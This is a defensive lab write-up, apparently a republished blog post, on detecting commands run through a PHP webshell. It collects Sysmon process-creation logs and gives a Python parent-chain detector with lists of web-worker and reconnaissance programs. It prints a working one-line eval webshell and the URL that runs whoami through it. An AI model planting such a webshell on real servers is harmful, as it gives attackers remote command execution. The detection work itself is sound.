• Sysmon data collection and detection for interactive commands run through a webshell backdoor


    Download phpstudy (link: https://public.xp.cn/upgrades/phpStudy_64.zip) and start wnmp, as the original post shows in a screenshot.

    Webshell contents:

    <?php echo "Your response is: ";?>
    
    <?php @eval($_GET['cmd']); // deliberately vulnerable: eval() runs whatever PHP source arrives in the cmd query parameter ?>
    

    Save this as shell.php under C:\phpstudy_pro\WWW.

    Run a command from the browser:

    localhost/shell.php?cmd=system(%27whoami%27);

    Note the trailing ";": the cmd parameter is PHP source that eval() executes (%27 is a URL-encoded single quote), so the statement must be terminated.

    The page then returns the output of whoami.

    Now look at what Sysmon collected: two events, both Event ID 1 (Process Create).

     The first is php-cgi.exe starting cmd.exe on behalf of system(): on Windows, PHP hands the command to cmd.exe /c, which is why cmd.exe appears at all and why its CommandLine is cmd.exe /c "whoami":

    Process Create:
    RuleName: -
    UtcTime: 2022-04-26 08:20:16.986
    ProcessGuid: {0bf95bee-ab40-6267-aa07-000000000900}
    ProcessId: 5512
    Image: C:\Windows\System32\cmd.exe
    FileVersion: 10.0.19041.746 (WinBuild.160101.0800)
    Description: Windows Command Processor
    Product: Microsoft® Windows® Operating System
    Company: Microsoft Corporation
    OriginalFileName: Cmd.Exe
    CommandLine: cmd.exe /c "whoami"
    CurrentDirectory: C:\phpstudy_pro\WWW\
    User: DESKTOP-92JS9SJ\bonel
    LogonGuid: {0bf95bee-6815-6267-e29f-050000000000}
    LogonId: 0x59FE2
    TerminalSessionId: 1
    IntegrityLevel: High
    Hashes: MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18
    ParentProcessGuid: {0bf95bee-a686-6267-5407-000000000900}
    ParentProcessId: 3952
    ParentImage: C:\phpstudy_pro\Extensions\php\php7.3.4nts\php-cgi.exe
    ParentCommandLine: ../Extensions/php/php7.3.4nts/php-cgi.exe
    ParentUser: DESKTOP-92JS9SJ\bonel
    

     The second is cmd.exe starting whoami.exe; note that its ParentProcessGuid equals the ProcessGuid of the cmd.exe event above:

    Process Create:
    RuleName: -
    UtcTime: 2022-04-26 08:20:17.010
    ProcessGuid: {0bf95bee-ab41-6267-ac07-000000000900}
    ProcessId: 4368
    Image: C:\Windows\System32\whoami.exe
    FileVersion: 10.0.19041.1 (WinBuild.160101.0800)
    Description: whoami - displays logged on user information
    Product: Microsoft® Windows® Operating System
    Company: Microsoft Corporation
    OriginalFileName: whoami.exe
    CommandLine: whoami
    CurrentDirectory: C:\phpstudy_pro\WWW\
    User: DESKTOP-92JS9SJ\bonel
    LogonGuid: {0bf95bee-6815-6267-e29f-050000000000}
    LogonId: 0x59FE2
    TerminalSessionId: 1
    IntegrityLevel: High
    Hashes: MD5=A4A6924F3EAF97981323703D38FD99C4,SHA256=1D4902A04D99E8CCBFE7085E63155955FEE397449D386453F6C452AE407B8743,IMPHASH=7FF0758B766F747CE57DFAC70743FB88
    ParentProcessGuid: {0bf95bee-ab40-6267-aa07-000000000900}
    ParentProcessId: 5512
    ParentImage: C:\Windows\System32\cmd.exe
    ParentCommandLine: cmd.exe /c "whoami"
    ParentUser: DESKTOP-92JS9SJ\bonel
    

    So the EDR detection should key on the parent chain rather than on whoami.exe by itself: whoami.exe's parent is cmd.exe, and cmd.exe's parent is php-cgi.exe, the web server's PHP worker. A rule that flags a shell or reconnaissance command whose parent or grandparent is a web-server process (php-cgi.exe here; w3wp.exe, httpd.exe and the like on other stacks) catches both events, and the first event alone, cmd.exe spawned by php-cgi.exe, is already enough to fire. One caveat about the captured fields: in this lab the worker runs as the interactive user bonel at High integrity in TerminalSessionId 1 because phpstudy was launched from the desktop session; on a production server the worker usually runs under a service account, so User and IntegrityLevel will differ, but the parent chain looks the same.
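    The parent-chain check described above, written out as runnable detection logic. This is an added example, not the post author's code: it parses the two Sysmon records shown above (embedded as constructed sample input, trimmed to the fields the detector reads), links each process to its parent through ProcessGuid / ParentProcessGuid, and alerts when a web-server worker appears anywhere in a process's ancestry. The WEB_WORKERS and RECON image lists are assumptions for illustration, not a vetted detection catalogue.

```python
"""Parent-chain detection over Sysmon Event ID 1 (Process Create) records.

Added example, not the post author's code. Assumed for illustration:
the WEB_WORKERS and RECON name lists and the constructed SAMPLE_EVENTS input.
"""
import ntpath

# Constructed sample input: the cmd.exe and whoami.exe events from the post,
# trimmed to the fields this detector reads.
SAMPLE_EVENTS = r"""
Process Create:
UtcTime: 2022-04-26 08:20:16.986
ProcessGuid: {0bf95bee-ab40-6267-aa07-000000000900}
ProcessId: 5512
Image: C:\Windows\System32\cmd.exe
CommandLine: cmd.exe /c "whoami"
User: DESKTOP-92JS9SJ\bonel
IntegrityLevel: High
ParentProcessGuid: {0bf95bee-a686-6267-5407-000000000900}
ParentImage: C:\phpstudy_pro\Extensions\php\php7.3.4nts\php-cgi.exe

Process Create:
UtcTime: 2022-04-26 08:20:17.010
ProcessGuid: {0bf95bee-ab41-6267-ac07-000000000900}
ProcessId: 4368
Image: C:\Windows\System32\whoami.exe
CommandLine: whoami
User: DESKTOP-92JS9SJ\bonel
IntegrityLevel: High
ParentProcessGuid: {0bf95bee-ab40-6267-aa07-000000000900}
ParentImage: C:\Windows\System32\cmd.exe
"""

# Assumed lists for illustration: web-server worker images and recon tools.
WEB_WORKERS = {"php-cgi.exe", "php.exe", "w3wp.exe", "httpd.exe", "nginx.exe"}
RECON = {"whoami.exe", "ipconfig.exe", "systeminfo.exe", "net.exe", "net1.exe",
         "tasklist.exe", "nltest.exe"}


def parse_events(text):
    """Split the Sysmon text into one dict of 'Key: Value' fields per record."""
    events = []
    for block in text.strip().split("\n\n"):
        fields = {}
        for line in block.splitlines():
            if ": " not in line:            # skips the 'Process Create:' header
                continue
            key, value = line.split(": ", 1)  # UtcTime also contains ':'
            fields[key.strip()] = value.strip()
        if "ProcessGuid" in fields:
            events.append(fields)
    return events


def ancestry(event, by_guid, max_depth=8):
    """Image paths from the process up through its ancestors.

    Follows ParentProcessGuid while the parent's own Event ID 1 was captured;
    when it was not (php-cgi.exe started before this capture), it falls back
    to the ParentImage field, so the chain still ends at the web worker.
    """
    chain = [event["Image"]]
    current = event
    for _ in range(max_depth):
        parent = by_guid.get(current.get("ParentProcessGuid"))
        if parent is None:
            chain.append(current.get("ParentImage", ""))
            break
        chain.append(parent["Image"])
        current = parent
    return chain


def detect(events):
    """Return one alert per process that has a web-server worker ancestor."""
    by_guid = {e["ProcessGuid"]: e for e in events}
    alerts = []
    for event in events:
        names = [ntpath.basename(p).lower() for p in ancestry(event, by_guid)]
        if not any(n in WEB_WORKERS for n in names[1:]):
            continue
        alerts.append({
            "pid": event["ProcessId"],
            "command": event["CommandLine"],
            "chain": " -> ".join(reversed(names)),
            # a shell under a web worker is suspicious; recon under one is worse
            "severity": "high" if names[0] in RECON else "medium",
        })
    return alerts


if __name__ == "__main__":
    for alert in detect(parse_events(SAMPLE_EVENTS)):
        print(f"[{alert['severity']}] pid={alert['pid']} {alert['chain']}  "
              f"cmd={alert['command']!r}")
```

    Run against the two records it produces a medium alert for cmd.exe (chain php-cgi.exe -> cmd.exe) and a high alert for whoami.exe (chain php-cgi.exe -> cmd.exe -> whoami.exe). The fallback to ParentImage matters in practice: the worker's own start event is usually outside the collection window, so a detector that only follows GUID links would lose the web-server ancestor.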

  • Original article: https://www.cnblogs.com/bonelee/p/16195321.html
Copyright © 2020-2023  润新知